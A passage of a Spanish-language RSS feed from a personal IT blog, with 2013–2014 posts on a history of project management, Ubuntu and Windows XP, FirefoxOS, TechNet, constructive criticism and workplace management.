<li>Pantalla capacitativa de 3,5 pulgadas con una resolución HVGA</li>
<li>Cámara trasera de 2 MP y delantera de 0,3 MP.</li>
<li><em>Bluetooth</em>, Wi-Fi y GPS.</li>
</ul>
<p><img src="/assets/spice_fire_one_mi.jpg" alt="Spice Fire One Mi"></p>
<p>Fuente:
<a href="http://tech.firstpost.com/news-analysis/spice-fire-one-running-firefox-os-to-launch-on-29-august-for-rs-2299-230409.html">http://tech.firstpost.com/news-analysis/spice-fire-one-running-firefox-os-to-launch-on-29-august-for-rs-2299-230409.html</a></p>
<p>Fuente de la imagen:
<a href="http://www.snapdeal.com/">http://www.snapdeal.com</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Breve historia de la Gestión de Proyectos</title>
      <link>https://www.igalvan.es/posts/breve-historia-de-la-gestion-de/</link>
      <pubDate>Wed, 16 Apr 2014 10:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/breve-historia-de-la-gestion-de/</guid>
      <description><![CDATA[<h2> Proyectos en la Antigüedad</h2><br /><div style="text-align: justify;">Cuando nos ponemos a pensar en las grandes obras de la Antigüedad y cómo fueron construidas, aún casi sin pensarlo, llegamos a la conclusión de que todas estas estructuras necesitaron de personas que organizarán todos los recursos necesarios para conseguir el objetivo final, completar la obra dentro de unos márgenes de tiempo y costes y con unos niveles de calidad adecuados. Es entonces cuando nos damos cuenta que la profesión de gestor de proyectos tiene ya más de tres mil años de antigüedad, remontándose a la época del Antiguo Egipto la construcción de la Gran Pirámide de Giza.<br /><a name='more'></a><br /><br /><h4>2550 a.C. - La Gran Pirámide de Giza</h4></div><div style="text-align: justify;">Sigue siendo un misterio cómo en la Antigüedad se llegó a completar una obra de semejantes dimensiones realizada completamente a mano. Existen pruebas documentales de que existieron arquitectos cuya responsabilidad específica era la construcción de cada una de las cuatro caras de la pirámide en un proceso que duró más de veinte años. Completarla requirió obligatoriamente contar con cierto tipo de planificación para el diseño y posterior ejecución de la obra,<br /><br /><h4>208 a.C. - La Gran Muralla China</h4>Sin duda otro de los grandes proyectos de construcción de la Antigüedad. Tiene una longitud de más de 8800 kilómetros y se construyó a lo largo de cinco períodos de la Historia. Durante su construcción murieron más de diez millones de trabajadores. De acuerdo a los datos históricos su construcción fue acometida por tres grandes grupos de trabajadores diferenciados por su clase social: criminales, soldados y el pueblo llano.</div><h3> La era moderna de la Gestión de Proyectos</h3><div style="text-align: justify;">La alta industrialización y las demandas de ambas Guerras Mundiales forzaron a la aparición de científicos dedicados a idear nuevos métodos y técnicas orientadas a la Gestión de Proyectos que permitieran hacer frente a las nuevas necesidades y sobre todo a la especialización mayor que se requería para poder llevarlos adelante con garantías de éxito.</div><h4>1917 - El diagrama de Gantt</h4><div style="text-align: justify;">Henry Gantt creó la que está considerada como una de las herramientas básicas de la gestión de proyectos. Una idea simple, representar jerárquicamente dentro de una representación visual las tareas en bloques de forma que es sencillo distinguir su programación, que supuso toda una innovación. Uno de los primeros proyectos importantes donde se utilizó fue en el proyecto de la Presa Hoover en 1931.</div><h3>1956 - Fundación de la Asociación Americana de Ingenieros de Costes (AACE)</h3><div style="text-align: justify;">En la actualidad sigue siendo una de las organizaciones de referencia para los gestores de proyectos y otros especialistas de esta rama. En el año 2006 publicaron el primer proceso integrado para el portafolio, el programa y la gestión de proyectos denominado Marco de Gestión del Coste Total (TCM).</div><h3>1957 - El Método del Camino Crítico (CPM) </h3><div style="text-align: justify;">Inventado por la Corporación Dupont, el CPM es una técnica usada para predecir la duración de los proyectos analizando qué secuencia de actividades tiene menor capacidad para ser modificada en su planificación.Inicialmente fue utilizada para gestionar los procesos de puesta en fuera de servicio de plantas químicas para realizar labores de mantenimiento. Gracias a su éxito se ha convertido en un método básico en la Gestión de Proyectos.</div><h3>1958 - La Técnica de Revisión y Evaluación de Programas (PERT) </h3><div style="text-align: justify;">Creada por la Oficina de Proyectos Especiales de la Marina del Departamento de Defensa de los Estados Unidos como parte del Proyecto Polaris que tenía como objetivo la construcción de misiles balísticos para sus submarinos durante la Guerra Fría. PERT permite analizar las tareas que conforman un proyecto e identificar el tiempo mínimo necesario para completarlas.</div><h3>1962 - Creación de la Estructura de Desglose del Trabajo (WBS)</h3><div style="text-align: justify;">El Departamento de Defensa (DoD) del Gobierno de los Estados Unidos de América crea también el concepto de WBS como parte del Proyecto Polaris. Después de que se completará el proyecto decidieron publicar el método, y se estableció que se utilizará a partir de ese momento para los futuros proyectos de esta organización. La WBS es un árbol jerárquico y detallado de cada uno de los entregables y tareas que se necesitan para completar un proyectos. Hoy en día sigue siendo una de los herramientas más usadas y eficaces para la Gestión de Proyectos.</div><h3>1965 - Se funda la Asociación Internacional de Gestión de Proyectos (IPMA)</h3><div style="text-align: justify;">La IPMA fue la primera asociación profesional del mundo de la Gestión de Proyectos fundada en Viena (Austria) por un grupo como un foro para compartir información entre gestores de proyectos. La asociación es en realidad una federación de diferentes asociaciones nacionales dedicadas a la Gestión de Proyectos. En la actualidad se estima que tiene unos 120000 miembros..</div><h3>1969 - Se crea el Instituto de Gestión de Proyectos (PMI) </h3><div style="text-align: justify;">Cinco voluntarios fundaron el PMI como una organización profesional sin ánimo de lucro dedicada a la profesión de Gestión de Proyectos en el año 1969 en el estado de Pennsylvania (EE.UU.). Desde entonces el PMI se ha convertido en una referencia para todos los que desempeñan esta profesión. Una de sus contribuciones más notables es la Guía al Cuerpo del Conocimiento de Gestión de Proyectos (PMBOK) junto con el programa de certificaciones del PMI. Este programa está compuesto por dos níveles, el primero conocido como Asociado Certificado en Gestión de Proyectos y el segundo como Profesional en Gestión de Proyectos (PMP).</div><h3>1970 - Se crea el método en cascada</h3><div style="text-align: justify;">Winston Royce crea el método en cascada donde cada fase es completada y perfeccionada antes de pasar a la siguiente.</div><h3>1975 - Se publica el El Mítico Hombre-Mes</h3><div style="text-align: justify;">La idea de que añadir mano de obra a un proyecto de software que sufre retrasos solo consigue que se retrase más es conocida como la Ley de Brooks y es la idea fundamental del libro El Mítico Hombre-Mes. Se basa en el principio de que el esfuerzo que es necesario invertir en las nuevas comunicaciones humanas necesarias para añadir otro miembro a un equipo de desarrollo es mayor que lo que cualquiera pudiera esperar. Por lo tanto, puede llegar a darse el caso de que el tiempo necesario para incluir a esta nueva persona sea mayor que el tiempo recortado al aumentar la cantidad de recursos disponibles. Esta situación es tanto más probable según se incremente la cantidad de personas a añadir y la complejidad del proyecto.</div><br /><h3>1986 - Nacimiento de Scrum</h3><div style="text-align: justify;">Scrum es un método de desarrollo ágil de software basado en el trabajo intensivo e interdependiente de múltiples pequeños grupos. Su primera mención fue en este año en el documento El Nuevo Nuevo Juego del Desarrollo de Producto redactado por Takeuchi y Nonaka. A pesar de que inicialmente fue planteado como un método para proyectos de desarrollo de software, actualmente se usa como una aproximación general para la gestión de proyectos o programas.</div><h3>1987 - Se publica la primera versión de la Guía PMBOK</h3><div style="text-align: justify;">En este año se publica como un libro blanco la Guía PMBOK como un intento de documentar y estandarizar las prácticas y la información recogida dentro de la Gestión de Proyectos. La primera edición fue publicada en 1996, seguida de una segunda versión en el año 2000 y una tercera en el año 2004. Esta guía está considerada como una de las herramientas básicas para cualquier profesional que se dedique a la Gestión de Proyectos.</div><h3>1989 - La Gestión del Valor Ganado (EVM) gana protagonismo</h3><div style="text-align: justify;">A pesar de que el concepto del valor ganado ha estado presente en las empresas desde principios del siglo XX, sólo se comenzó a aplicarlo de forma intensiva en la Gestión de Proyectos a partir de finales de la década de 1980. Es en 1989 cuando fue incorporada por el Departamento de Defensa del Gobierno de los Estados Unidos de América y pasa a ser parte esencial de la gestión de programas. A partir de ese momento comienza a ganar notoriedad y se incorpora a todos los métodos de Gestión de Proyectos.</div><h3>1989 - Se publica PRINCE</h3><div style="text-align: justify;">PRINCE es el acrónimo de Proyectos en Entornos Controlados. Publicado por la Agencia Central de Informática y Telecomunicaciones (CCTA) del Gobierno del Reino Unido como un estándar para todos los proyectos TIC gubernamentales. Este método se ganó desde el principio la fama de ser demasiado rígido, complicado y aplicable sólo a proyectos muy grandes.</div><h3>1994 - Primera publicación del informe CHAOS</h3><div style="text-align: justify;">El Grupo Standish publica bianualmente un informe que información de fallos de proyectos TIC con el objetivo de mostrar a los profesionales del sector diferentes técnicas y métodos que permitan mejorar las tasas de éxito e incrementar el valor de las inversiones en TIC realizadas por las empresas.</div><h3>1996 - Se publica PRINCE2</h3>El método PRINCE fue originalmente creado para los proyectos de las Tecnologías de la Información y las Comunicaciones para reducir los costes y la superación de las fechas de ejecución establecidas. Esta segunda revisión se diseñó orientada en que fuera más genérica y aplicable a cualquier tipo de proyecto.<br /><h3>1997 - Gestión de Proyectos por Cadena Crítica (CCPM)</h3><div style="text-align: justify;">Está basado en métodos y algoritmos generados a partir de la Teoría de las Restricciones (TOC) creada por Eliyahu M. Goldratt wn 1984. Un proyecto que siga este método mantendrá todos lo recursos con una carga nivelada al mismo tiempo que les exige que sean flexibles con los tiempos de inicio y que sean capaces de cambiar de forma rápida entre tareas con el objetivo de mantener las fechas programadas.</div><h3>1998 - PMBOK se convierte en un estándar</h3><div style="text-align: justify;">El Instituto Nacional Estadounidense de Estándares (ANSI) reconoce a PMBOK como un estándar, y posteriormente en ese mismo año lo hace el Instituto de Ingenieros Eléctricos y Electrónicos (IEEE).</div><h3>2001 - El Manifiesto Ágil</h3><div style="text-align: justify;">En febrero de 2001 se reunieron en Utah (EE.UU.) 17 desarrolladores de software para discutir sobre métodos ligeros de desarrollo de software. Poco después publicaron el Manifiesto para el desarrollo de software ágil que define el método del mismo nombre. Algunos de sus autores fundaron la Alianza Ágil, una organización sin ánimo de lucro que promociona el desarrollo de software siguiente este manifiesto.</div><h3>2006 - Marco de Gestión de Costo Total (TCM)</h3><div style="text-align: justify;">Es el nombre dado por la AACE International al proceso que permite aplicar los conocimientos de la ingeniería de costes a la Gestión de Proyectos. La idea fue introducida y publicada en la década de los noventa del siglo XX.</div><h3>2008 - Cuarta edición de la Guía PMBOK</h3><div style="text-align: justify;">Esta cuarta edición de la guía aporta mejoras que convierten el método en un sistema más sencillo de entender e implementar. Al mismo tiempo se aprovechó para proporcionar mayor consistencia y claridad a los textos y generar dos nuevos procesos respecto a la anterior versión.</div><h3>2009 - Revisión completa de PRINCE2</h3><div style="text-align: justify;">La Oficina de Comercio Gubernamental (OGC) dependiente de la Oficina del Tesoro del Gobierno del Reino Unido realizó en 2009 una revisión completa de PRINCE2 para simplificar el método y hacerlo más fácilmente adaptable a las organizaciones. En su conjunto la revisión aporta mejores herramientas, recomendaciones y métodos para poder gestionar los proyectos en tiempo, dentro del presupuesto y con la calidad adecuada.</div><h3>2012 - Quinta edición de la Guía PMBOK</h3><div style="text-align: justify;">La quinta edición de esta guía fue publicada en diciembre de 2012. Esta actualización introduce una décima área del conocimiento denominada, Gestión de los Interesados del Proyecto junto con nuevos procesos de planificación entre otras novedades más.</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Instalar Google Earth en Ubuntu 13.10</title>
      <link>https://www.igalvan.es/posts/instalar-google-earth-en-ubuntu-1310/</link>
      <pubDate>Wed, 16 Apr 2014 10:44:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/instalar-google-earth-en-ubuntu-1310/</guid>
      <description><![CDATA[<p>Si tenéis como yo instalada la versión de 64 bits de <i>Ubuntu</i> 13.10 y queréis utilizar <i>Google Earth</i>, descargaros la versión de 32 bits. No tendréis ningún problema de dependencias como sucede con la de 64 bits.<br /><br />Todo se debe al empeño de <i>Canonical</i> de eliminar ia32-libs de su distribución, lo que hace que la aplicación de <i>Google Earth</i> para 64 bits no se instale, e intentar añadir el paquete ia32-libs requiere habilitar repositorios antiguos, algo que no me gusta para nada.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Fin del soporte de Windows XP</title>
      <link>https://www.igalvan.es/posts/fin-del-soporte-de-windows-xp/</link>
      <pubDate>Tue, 08 Apr 2014 10:42:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/fin-del-soporte-de-windows-xp/</guid>
      <description><![CDATA[<p>Parecía que no iba a llegar nunca este día, pero al final hoy, después de casi trece años de servicio, <i>Microsoft</i> finaliza el ciclo de vida de soporte de <i>Windows</i> <i>XP</i>. Después de tanto tiempo se le va a echar de menos.<br /><br />Pero el Rey ha muerto, viva el Rey, y ya es hora, si no lo has hecho ya, de que migres a otro sistema operativo. Yo ya he hecho mi elección, estoy migrando mis equipos a <i>Ubuntu</i>, ¿y tú cuál has elegido?</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cita del día - 15/07/2013</title>
      <link>https://www.igalvan.es/posts/cita-del-dia-15072013/</link>
      <pubDate>Mon, 15 Jul 2013 17:42:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cita-del-dia-15072013/</guid>
      <description><![CDATA[<blockquote class="tr_bq"><span class="" id="result_box" lang="es"><span class="hps">"<i>El mayor</i></span><i> <span class="hps">enemigo del conocimiento</span> <span class="hps">no es la ignorancia</span>, es <span class="hps">la ilusión de</span> </i><span class="hps"><i>conocimiento</i>"</span> <span class="hps">-</span> <span class="hps">Stephen</span> <span class="hps">Hawking</span></span></blockquote>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Retirada de las suscripciones en Technet</title>
      <link>https://www.igalvan.es/posts/retirada-de-las-suscripciones-en-technet/</link>
      <pubDate>Tue, 02 Jul 2013 19:02:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/retirada-de-las-suscripciones-en-technet/</guid>
      <description><![CDATA[<div style="text-align: justify;">De piedra me he quedado cuando he visto en la página de Technet que Microsoft ha decidido cancelar las suscripciones a partir del 30 de julio de 2013. Aunque eso sí, haran honor a los contratos actuales y permitirán que las renovaciones actuales expiren. Una vez expiradas las suscripciones, Microsoft nos ofrece como alternativas:</div><ul style="text-align: justify;"><li>TechNet Evaluation Center: Software de evaluación gratuita sin límites de características, disponible durante 30 a 180 días. Incluye recursos enriquecidos de evaluación y http://technet.microsoft.com/es-es/virtuallabs/, que le permiten evaluar software sin tener que instalar bits de manera local.</li><li>Microsoft Virtual Academy: sitio de aprendizaje en línea gratuito que incluye más de 200 cursos técnicos de aprendizaje técnico dirigidos por expertos en más de 15 tecnologías de Microsoft, con más que se agregan cada semana.</li><li>Foros de TechNet: Foros en línea gratuitos en los que los profesionales de TI pueden hacer preguntas técnicas y recibir respuestas rápidas de los miembros de la comunidad.</li></ul><div style="text-align: justify;">No entiendo esta estrategia de Microsoft, muchos profesionales como yo usabamos estas suscripciones para montar nuestras maquetas y laboratorios sin tener que estar pendientes de las fechas de expiración de las licencias de prueba, lo que en mi caso hubiera supuesto una cantidad de horas enorme.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bueno, no hay mal que por bien no venga, supongo que esta es una razón más para continuar separandome de los productos de Microsoft y seguir investigando y profundizando en otras áreas de la informática.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Enlace: <a href="http://technet.microsoft.com/subscriptions/default.aspx" target="_blank">http://technet.microsoft.com/subscriptions/default.aspx</a></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Anatol Rapoport y la resolución de conflictos mediante la critica constructiva</title>
      <link>https://www.igalvan.es/posts/anatol-rapoport-y-la-resolucion-de/</link>
      <pubDate>Sun, 09 Jun 2013 10:29:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/anatol-rapoport-y-la-resolucion-de/</guid>
      <description><![CDATA[<div style="text-align: justify;">Hoy quiero hablar de una de esas mentes privilegiadas que permanecen en el anonimato o al menos no son figuras publicas, pero cuya contribución al bien común del conocimiento resulta de una gran importancia.<br /><a name='more'></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Anatol Rapoport fue un matemático ucraniano nacionalizado estadounidense. Nacido en la segunda década del siglo XX, concretamente 1911, en la ciudad del <i>Oblast</i> de <i>Kharkiv</i> llamada <i>Lozovaya</i>. Trabajó en diferentes áreas pero especialmente en la resolución de conflictos. No voy a extenderme más en su biografía, podéis consultar la <a href="https://en.wikipedia.org/wiki/Anatol_Rapoport" target="_blank">Wikipedia</a> o consultar su bitácora <a href="http://www.anatolrapoport.net/" target="_blank">www.anatolrapoport.net</a>.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En lo que concierne a esta entrada, quiero hacer hincapié en una lista de reglas que definió para poder crear lo que actualmente se llaman criticas constructivas. En resumen, las cuatro ideas básicas son:</div><ol style="text-align: justify;"><li><b>Ponerse en la piel del otro e intentar comprender la posición de la otra persona</b>. Es necesario explicarle a la otra persona cómo hemos interpretado sus argumentos para dejarle claro que hemos entendido correctamente su posición.</li><li><b>Revisar los puntos en los que se coincide y comentarlos</b>. Primero debemos tender lazos de conexión y demostrarle a la otra parte que hemos analizado y que sabemos de qué estamos hablando, es decir, que no nos mueven intereses particulares como la envidia o la soberbia.</li><li><b>Analizar las lecciones aprendidas de los comentarios de la otra persona</b>. Todos los días aprendo algo nuevo o mejoro mi comprensión un tema compartiendo información, ¿vosotros no?</li><li><b>Expresar nuestra critica o refutación a sus ideas de forma ordenada, clara y positiva</b>. La grandilocuencia y los discursos vehementes están bien para los políticos cuando salen en televisión. La persona que tienes enfrente espera lo mismo que tú, aprender y mejorar, pero también tiene sentimientos y las personas no solemos aceptar muy bien que alguien intente cambiar nuestras ideas, esto requiere de mucha voluntad y paciencia por ambas partes.</li></ol><div style="text-align: justify;">Cómo muchas veces, no se tratan de reglas mágicas y revolucionarias que nos van a abrir las puertas del cielo, eso lo dejo para los libros basados en la ética de la personalidad (ver <a href="http://es.wikipedia.org/wiki/Stephen_Covey" target="_blank">Stephen R. Covey</a>).&nbsp;</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Estas cuatro reglas ayudan a construir y a mejorar las relaciones sociales que mantenemos basándonos en la idea de sumar conocimiento mediante la construcción de puentes de intercambio de información en ambas direcciones.<br /><br />Yo intento seguirlas cada vez que me tengo que enfrentar a una situación de conflicto, lo que en mi trabajo es algo que se repite diariamente, y hasta la fecha me han permitido mejorar mucho mis habilidades en este área y sobre todo a reducir la tensión y los malos hábitos en los que habíamos caído en mi grupo de trabajo.</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mercaderes, mercenarios o siervos</title>
      <link>https://www.igalvan.es/posts/mercaderes-mercenarios-o-siervos/</link>
      <pubDate>Sun, 05 May 2013 09:22:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/mercaderes-mercenarios-o-siervos/</guid>
      <description><![CDATA[<div style="text-align: justify;">Buen artículo sobre qué rol quieres asumir en el trabajo. Me he sentido bastante identificado, ya que hace ya bastantes años comencé siendo siervo y en la actualidad me he convertido en un mercenario. La pregunta que me hago ahora es si algún día seré capaz de dar el siguiente paso y convertirme en mercader.</div><br />Enlace:<br /><br /><span style="font-size: large;"><a href="http://desencadenado.com/2013/05/mercaderes-mercenarios-siervos.html" target="_blank">http://desencadenado.com/2013/05/mercaderes-mercenarios-siervos.html</a></span>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mozilla presenta FirefoxOS Simulator 3.0</title>
      <link>https://www.igalvan.es/posts/mozilla-presenta-firefoxos-simulator-30/</link>
      <pubDate>Sun, 05 May 2013 07:07:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/mozilla-presenta-firefoxos-simulator-30/</guid>
      <description><![CDATA[<div style="text-align: justify;">Los responsables de la organización <i>Mozilla</i>, responsable del desarrollo del navegador <i>Firefox</i>, han anunciado la disponibilidad de la versión final de <i>Firefox OS Simulator 3.0</i>.<br /><a name='more'></a><br /><br />Esta nueva versión integra soporte para rotar la pantalla de forma virtual, además de poder usar datos falsos de geolocalización para poder probar esta característica así como también nuevas versiones del motor de presentación existente en el navegador web <i>Firefox</i> e incluso de Gaia, que vendría a ser la interfaz gráfica que encontraremos dentro de <i>Firefox OS</i>.<br /><br />Gracias a estas herramientas, los usuarios con un <i>smartphone</i> compatible con <i>Firefox OS</i> mediante una conexión USB, podrán lanzar las aplicaciones instaladas en la nueva versión del simulador de <i>Firefox OS</i> directamente al dispositivo<br /><br />La instalación de <i>Firefox OS Simulator 3.0</i> se hace a través del complemento para el navegador <i>Firefox</i> que necesitaremos tener instalado en nuestro ordenador. A partir de ahí podremos lanzar el simulador desde las herramientas para desarrolladores y comenzar a trabajar con esta plataforma.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Os dejo un par de imagenes para que veais como lucen las aplicaciones, personalmente me ha encantado y creo que si tienen un poco de suerte y un mucho de trabajo duro va a poder presentar batalla a sus rivales.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ZDOHPsPHRHU/UYX2lcwyDzI/AAAAAAAAD84/Wr8P1a55NRk/s1600/Firefox+OS+Simulator_002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-ZDOHPsPHRHU/UYX2lcwyDzI/AAAAAAAAD84/Wr8P1a55NRk/s320/Firefox+OS+Simulator_002.png" width="185" /></a><a href="http://1.bp.blogspot.com/-Zql6C2_-5_U/UYX2lBNT3LI/AAAAAAAAD80/4QjiF8NQe-Q/s1600/Firefox+OS+Simulator_003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-Zql6C2_-5_U/UYX2lBNT3LI/AAAAAAAAD80/4QjiF8NQe-Q/s320/Firefox+OS+Simulator_003.png" width="185" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dJWY-62gGfE/UYX2ljw0H-I/AAAAAAAAD88/PBlPNN-WUDo/s1600/Firefox+OS+Simulator_004.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-dJWY-62gGfE/UYX2ljw0H-I/AAAAAAAAD88/PBlPNN-WUDo/s320/Firefox+OS+Simulator_004.png" width="185" /></a><a href="http://2.bp.blogspot.com/-bP9Lb8PjHCo/UYX2mICarJI/AAAAAAAAD9E/pNzMcFKTY6Y/s1600/Firefox+OS+Simulator_005.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-bP9Lb8PjHCo/UYX2mICarJI/AAAAAAAAD9E/pNzMcFKTY6Y/s320/Firefox+OS+Simulator_005.png" width="185" /></a></div><div style="text-align: justify;"></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Por último, como siempre, el enlace de descarga directa.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><a href="https://addons.mozilla.org/es/firefox/addon/firefox-os-simulator/" target="_blank">https://addons.mozilla.org/es/firefox/addon/firefox-os-simulator/</a></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mejorar la productividad en grupo</title>
      <link>https://www.igalvan.es/posts/mejorar-la-productividad-en-grupo/</link>
      <pubDate>Wed, 01 May 2013 12:57:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/mejorar-la-productividad-en-grupo/</guid>
      <description><![CDATA[<div style="text-align: justify;">Siempre he opinado que crear un equipo de trabajo estable, en el que se pueda confiar y que esté formado por personas de diferentes perfiles y sensibilidades es una utopía para cualquier jefe (léase coordinador, gestor de equipos, etc.). Conseguir este objetivo debe ser una prioridad que requiere de un conjunto de habilidades bastante amplia y de mucho, muchísimo esfuerzo pero la recompensa es también muy grande, tener un equipo ganador.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">En el siguiente artículo se explican algunas claves para conseguir un equipo de trabajo equilibrado.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><a href="http://blog.zyncro.com/2013/04/10/2-claves-para-la-productividad-en-grupo/" target="_blank">http://blog.zyncro.com/2013/04/10/2-claves-para-la-productividad-en-grupo/</a></div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Si eres carpintero, no me hables de martillos</title>
      <link>https://www.igalvan.es/posts/si-eres-carpintero-no-me-hables-de/</link>
      <pubDate>Wed, 01 May 2013 11:52:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/si-eres-carpintero-no-me-hables-de/</guid>
      <description><![CDATA[<div style="text-align: justify;">Para nosotros, los <i>tecnólogos</i>, montar un Negocio es poco más que producir soluciones tecnológicas cobrando por ello. Pero un Negocio es mucho más, un Negocio tiene un componente social enorme. Si no entendemos esto nos convertimos en dispensadores automatizados de productos y eso no es lo que quieren los Clientes.<br /><br /><a href="http://desencadenado.com/2013/04/si-eres-carpintero-no-me-hables-de-martillos.html" target="_blank">http://desencadenado.com/2013/04/si-eres-carpintero-no-me-hables-de-martillos.html</a><br /><br /><a name='more'></a></div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />Nuestros Clientes quieren, y necesitan, que encontremos respuestas a sus problemas y necesidades, que les aportemos verdaderas soluciones que les permitan optimizar su Negocio, detectar nichos de mercado donde mejorar o establecerse mediante el uso de las Tecnologías de la Información, es decir, tenemos que aportarles valor y tenemos que hacerlo hablando su idioma y no el nuestro, adaptándonos y no forzando a que los demás se adapten a nosotros.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">¿No me crees? Intenta ponerte dentro de esta situación que por cierto es real porque sencillamente me paso a mí. Voy a comprarme una lavadora a cualquier establecimiento de electrodomésticos y me atiene un vendedor con su impecable uniforme, muy educado y amable al que le expongo mis necesidades, en mi caso comprar una lavadora económica y eficiente (el clásico bueno, bonito y barato) porque la que tenía se ha estropeado. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">¿Y yo qué sabes de lavadoras? Pues supongo que lo mismo que tú, casi nada. Siguiendo con nuestro ejemplo, nuestro amable vendedor empieza a hablarme de ángulos de rotación del tambor, sistemas de inercia y control, sistemas inteligentes computarizados y sensores de humedad, temperatura, tipo de tejido de la ropa para cada tipo de ciclo, me hace un alegato patriótico por las marcas españolas, bla, bla, bla… </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Resultado: Una hora de cháchara y sigo sin lavadora nueva. Eso sí tengo cuatro o cinco precios diferentes, un montón de referencias tecnológicas de las que no me he enterado de nada y salgo confuso por la puerta rumbo al siguiente establecimiento a ver si encuentro alguien al que entienda y que me entienda a mí.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Motivo: No han sabido cubrir mis expectativas y necesidades. Si simplemente me hubiera dicho que uno de esos modelos era medianamente económico, que era sencilla de utilizar y que ahorraba electricidad, tiempo y jabón porque estaba diseñada para tratar cada tipo de lavado con ciclos específicos me la hubiera comprado sin mirar más y nos hubiéramos ahorrado cincuenta minutos.</div>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Departamento IT, sección Apagafuegos</title>
      <link>https://www.igalvan.es/posts/departamento-it-seccion-apagafuegos-it/</link>
      <pubDate>Mon, 29 Apr 2013 20:41:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/departamento-it-seccion-apagafuegos-it/</guid>
      <description><![CDATA[<p>“Estimado Señor-barra-Señora: Fuego, signo de exclamación, fuego, signo de exclamación, ayúdenme, signo de exclamación. 123 de la calle Carrington. Espero noticias suyas. Con mis mejores deseos, Maurice Moss”<br /><br /><a href="http://www.baquia.com/blogs/cloud/posts/2013-04-25-departamento-it-seccion-apagafuegos" target="_blank"><a href="http://www.baquia.com/blogs/cloud/posts/2013-04-25-departamento-it-seccion-apagafuegos">http://www.baquia.com/blogs/cloud/posts/2013-04-25-departamento-it-seccion-apagafuegos</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Se consuma la venta de ITIL</title>
      <link>https://www.igalvan.es/posts/se-consuma-la-venta-de-itil-sale-of/</link>
      <pubDate>Fri, 26 Apr 2013 21:37:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/se-consuma-la-venta-de-itil-sale-of/</guid>
      <description><![CDATA[<p>El 51% se la queda <i>Capita</i> PLC y el resto el <i>Cabinet</i> Office del gobierno británico. En resumen, ITIL deja de ser material libre de buenas prácticas para convertirse en pura carne mercantil. La única conclusión clara es que le espera un futuro muy negro para esta enorme recopilación de conocimiento de gestión.<br /><br /><a href="https://www.gov.uk/government/news/new-deal-will-market-government-professional-qualifications" target="_blank"><a href="https://www.gov.uk/government/news/new-deal-will-market-government-professional-qualifications">https://www.gov.uk/government/news/new-deal-will-market-government-professional-qualifications</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Qualytz: Gestiones que nos pueden llevar a la quiebra</title>
      <link>https://www.igalvan.es/posts/qualytz-gestiones-que-nos-pueden-llevar/</link>
      <pubDate>Mon, 22 Apr 2013 19:27:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/qualytz-gestiones-que-nos-pueden-llevar/</guid>
      <description><![CDATA[<p>Muchas empresas siguen sin entender que el software de gestión es la base de su negocio. Cualquier decisión que implique hacer cambios sobre este tipo de sistemas debe ser realizada con mucho cuidado o puede que las prisas hagan que se pierda algo más que el tiempo, como por ejemplo el negocio.</p><br/><p>¿No te lo crees? Pregúntaselo a los directivos de <em>Hershey&#8217;s</em>.</p><br /><a href='http://blog.qualytz.com/2013/04/gestiones-que-nos-pueden-llevar-la.html'>Qualytz: Gestiones que nos pueden llevar a la quiebra</a>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Fecha públicación - Debian 7 - Release date</title>
      <link>https://www.igalvan.es/posts/fecha-publicacion-debian-7-release-date/</link>
      <pubDate>Sun, 21 Apr 2013 12:02:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/fecha-publicacion-debian-7-release-date/</guid>
